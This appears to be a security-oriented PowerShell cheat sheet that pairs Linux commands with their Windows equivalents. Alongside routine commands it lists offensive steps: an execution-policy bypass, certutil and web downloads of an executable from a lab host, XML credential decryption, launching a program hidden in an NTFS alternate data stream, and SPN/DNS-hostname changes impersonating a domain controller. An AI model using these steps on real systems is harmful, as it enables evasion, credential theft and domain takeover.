PowerShell
Last modified: 2023-03-17
Powershell is a task automation and configuration management program from Microsoft. Powershell uses the Unicode UTF-16LE encoding by default.
Start PowerShell
On Linux
pwsh
# Execute PS commands without entering shell.
pwsh -Command <cmdlet>
On Windows
powershell
# Bypass ExecutionPolicy
powershell -ep bypass
# check for the result
PS> Get-ExecutionPolicy
Commands
OS Information
$PSVersionInfo
Change Directory
'cd' in Linux.
Set-Location -Path c:\Users\Administrator\Desktop
List Files
'ls' in Linux.
Get-ChildItem -File -Hidden
Get-ChildItem -File -Hidden -ErrorAction SilentlyContinue
Get-ChildItem -Directory -Hidden
Get-ChildItem -Directory -Hidden -Recurse -Filter '*secret*' -ErrorAction SilentlyContinue
Get-ChildItem -Path .\Desktop
Get-ChildItem -Recurse
View the Content of Files
'cat' in Linux.
Get-Content -Path example.txt
# 'cat | wc -l' in Linux
Get-Content -Path example.txt | Measure-Object -Word
#
(Get-Content -Path example.txt)[318]
Find Files
'find' in Linux.
Get-ChildItem -Path c:\\ -Filter "*.txt" -Recurse 2>$null
Set Content to a File
'echo hello > example.txt' in Linux.
Set-Content -Path .\example.txt -Value hello
Download Web Content
'wget' in Linux.
Invoke-WebRequest -Uri http://10.0.0.1:8000/example.exe -OutFile .\example.exe
certutil -urlcache -f http://10.0.0.1:8000/example.exe example.exe
Copy Files
'cp' in Linux.
copy c:\Tools\example.exe \Users\michael\Documents\
Cryptography
# md5sum in Linux
Get-FileHash -Algorithm MD5 example.exe
CertUtil -hashfile example.exe MD5
# sha256sum in Linux
Get-FileHash -Algorithm SHA256 example.exe
CertUtil -hashfile example.exe SHA256
# sha512sum in Linux
Get-FileHash -Algorithm SHA512 example.exe
CertUtil -hashfile example.exe SHA512
XML Credential
We can decrypt a password stored in an xml file.
# Decrypt a password in xml.
$Credential = Import-Clixml -Path .\example.xml
$Credential.GetNetworkCredential().password
Print Text Strings
'strings' in Linux.
.\Strings.exe -accepteula example.exe
Add New User
'useradd' in Linux.
New-LocalUser -Name "username" -Description "My first account" -NoPassword
# with password
$Password = Read-Host -AsSecureString
New-LocalUser -Name "username" -Password $Password -FullName "New User" -Description "My first account"
Show the Manual of Command
'man' or '--help' in Linux.
Get-Help Get-ChildItem
Get-Help Invoke-WebRequest
Create New File
'touch' in Linux.
New-Item example.txt
$null > example.txt
Create New Folder
'mkdir' in Linux
mkdir example_folder
Remove Files
'rm' in Linux
rm exxample.txt
rm -r example_folder
Reboot Computer
'reboot' in Linux
Restart-Computer
NTFS (New Technology File System) ADS (Alternate Data Steams)
NTFS ADS allows the malware creator to hide data in an endpoint.
Get-Item -Path file.exe -Stream *
To launch the hidden executable hiding with ADS, run the following command.
wmic process call create $(Resolve-Path example.exe:streamname)
Active Directory
# List all domain objects in AD
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com
# List all domain controllers in AD
Get-DomainController
# List all computers in the newtork
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
# Get the machine which participates the Active Directory
Get-ADComputer <PC-NAME> -properties dnshostname,serviceprincipalname
# Remove the current SPN attribute
Set-ADComputer <PC-NAME> -ServicePrincipalName @{}
# Set new DNS hostname to that of the DC
Set-ADComputer <PC-NAME> -DnsHostName VULNDC.vuln.local